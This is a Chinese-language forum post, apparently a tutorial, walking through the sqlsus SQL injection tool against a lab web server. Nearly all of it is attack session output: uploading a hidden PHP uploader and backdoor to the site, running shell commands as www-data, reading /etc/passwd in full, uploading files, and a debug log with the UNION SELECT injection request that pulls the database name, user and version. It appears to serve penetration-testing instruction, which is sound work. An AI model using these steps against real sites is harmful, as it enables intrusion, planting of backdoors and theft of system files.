切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
319 sqlsus 2[复制链接]
发表于 2012-10-13 13:54:24 | 显示全部楼层 |!read_mode!
获得一个SHELL
  1. sqlsus> backdoor
  2. [+] Variable "backdoor" not set, trying to upload the backdoor
  3. [+] Variable "uploader" not set, trying to upload the tiny uploader
  4. [+] Uploader successfully uploaded to http://192.168.71.130//.u.php
  5. [+] Backdoor successfully uploaded to http://192.168.71.130//.b.php

  6. [+] Logging backdoor session to /root/.sqlsus/backdoor.192.168.71.130.log
  7. [+] Type \help for help
  8. sqlsus backdoor (exec)>
复制代码
EXEC操作
  1. sqlsus backdoor (exec)> pwd
  2. /var/www
  3. sqlsus backdoor (exec)> id
  4. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  5. sqlsus backdoor (exec)>
复制代码


读文件
  1. sqlsus> download /etc/passwd
  2. --- /etc/passwd ---
  3. root:x:0:0:root:/root:/bin/bash
  4. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  5. bin:x:2:2:bin:/bin:/bin/sh
  6. sys:x:3:3:sys:/dev:/bin/sh
  7. sync:x:4:65534:sync:/bin:/bin/sync
  8. games:x:5:60:games:/usr/games:/bin/sh
  9. man:x:6:12:man:/var/cache/man:/bin/sh
  10. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  11. mail:x:8:8:mail:/var/mail:/bin/sh
  12. news:x:9:9:news:/var/spool/news:/bin/sh
  13. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  14. proxy:x:13:13:proxy:/bin:/bin/sh
  15. www-data:x:33:33:www-data:/var/www:/bin/sh
  16. backup:x:34:34:backup:/var/backups:/bin/sh
  17. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  18. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  19. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  20. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  21. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  22. syslog:x:101:103::/home/syslog:/bin/false
  23. messagebus:x:102:105::/var/run/dbus:/bin/false
  24. avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  25. avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  26. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  27. gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
  28. speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  29. kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  30. pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  31. rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
  32. hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  33. saned:x:112:121::/home/saned:/bin/false
  34. brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
  35. postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  36. smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  37. smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  38. vboxadd:x:999:1::/var/run/vboxadd:/bin/false
  39. sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
  40. mysql:x:1001:110::/home/mysql:/bin/false

  41. [+] File successfully saved to /root/.sqlsus/192.168.71.130/files/etc/passwd
  42. sqlsus>
复制代码


上传文件

  1. sqlsus> upload /root/.sqlsus/192.168.71.130/files/etc/passwd /var/www/1.txt
  2. [+] Variable "uploader" not set, trying to upload the tiny uploader
  3. [+] Uploader successfully uploaded to http://192.168.71.130//.u.php
  4. [+] Local file "/root/.sqlsus/192.168.71.130/files/etc/passwd" uploaded as "/var/www/1.txt" on the remote server
  5. sqlsus>
复制代码


DEBUG模式

  1. sqlsus> set debug
  2. debug = 0
  3. sqlsus> set debug 1
  4. debug = 1
  5. sqlsus> start
  6. [+] UNION columns already set to (0,1), skipping auto-detection... (use "autoconf select_columns" to do it anyway)
  7. [+] max_url_length already set to 8198 , skipping auto-detection... (use "autoconf max_sendable" to do it anyway)
  8. [+] Filling %target...
  9. [debug][3829] [GET] http://192.168.71.130/pen/news.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20BINARY%200,CONCAT(0x5,(SELECT%20CONCAT_WS(0x7,IFNULL(database(),0x6),IFNULL(version(),0x6),IFNULL(current_user,0x6))),0x5)%20
  10. [debug][3829] [result] pentest/5.1.61-0ubuntu0.10.10.1-log/root@localhost
  11. +----------+-----------------------------+
  12. | Variable | Value                       |
  13. +----------+-----------------------------+
  14. | database | pentest                     |
  15. | user     | 'root'@'localhost'          |
  16. | version  | 5.1.61-0ubuntu0.10.10.1-log |
  17. +----------+-----------------------------+
  18. 3 rows in set

  19. sqlsus>
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:49

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部